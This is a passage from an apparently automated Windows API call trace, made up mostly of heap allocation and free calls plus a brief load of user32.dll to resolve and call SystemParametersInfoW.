Flags=0x0, Size=0x20) returned 0x2a77cd8 [0233.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0233.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0233.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0233.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0233.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0233.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0233.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0233.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0233.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0233.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab470 [0233.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0233.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0233.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0233.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0233.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0233.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0233.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0233.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0233.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0233.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0233.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0233.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0233.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab590 [0233.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab638 [0233.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0233.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0233.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0233.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0233.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0233.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0233.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0233.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0233.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0233.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0233.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0233.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0233.605] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0233.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0233.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0233.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0233.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0233.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0233.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0233.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0233.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0233.606] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0233.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0233.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0233.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0233.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0233.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0233.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0233.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0233.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0233.606] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0233.606] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0233.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0233.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0233.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0233.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0233.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0233.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0233.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0233.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0233.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0233.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0233.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0233.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0233.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0233.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0233.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0233.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0233.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0233.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0233.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0233.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0233.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0233.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0233.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0233.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0233.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0233.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0233.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0233.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0233.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0233.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0233.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0233.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0233.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0233.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0233.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0233.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0233.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0233.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0233.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0233.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0233.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0233.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0233.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0233.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0233.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0233.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0233.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0233.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0233.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0233.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0233.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0233.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0233.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0233.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0233.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0233.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0233.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0233.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0233.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0233.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0233.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0233.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0233.609] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0233.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0233.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0233.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0233.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0233.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0233.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0233.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0233.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0233.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0233.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0233.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0233.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0233.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0233.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0233.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0233.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0233.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0233.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0233.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0233.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0233.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0233.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0233.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0233.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0233.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0233.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0233.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0233.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0233.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0233.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0233.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0233.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0233.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0233.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0233.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0233.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0233.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0233.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0233.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0233.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0233.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0233.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0233.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0233.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0233.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0233.612] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0233.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0233.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0233.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0233.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6fa0 [0233.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6fa0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0233.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0233.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0233.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0233.613] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0233.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0233.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0233.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0233.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0233.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0233.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0233.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0233.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0233.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0233.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0233.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0233.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0233.614] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0233.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866180 [0233.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f80 [0233.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0233.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0233.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0233.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0233.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0233.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0233.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0233.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0233.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0233.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0233.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0233.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0233.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0233.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0233.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0233.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0233.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0233.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0233.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0233.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0233.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0233.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0233.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0233.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0233.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0233.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0233.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0233.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0233.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0233.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0233.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0233.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0233.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0233.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0233.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0233.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0233.706] FreeLibrary (hLibModule=0x76240000) returned 1 [0233.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0233.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, 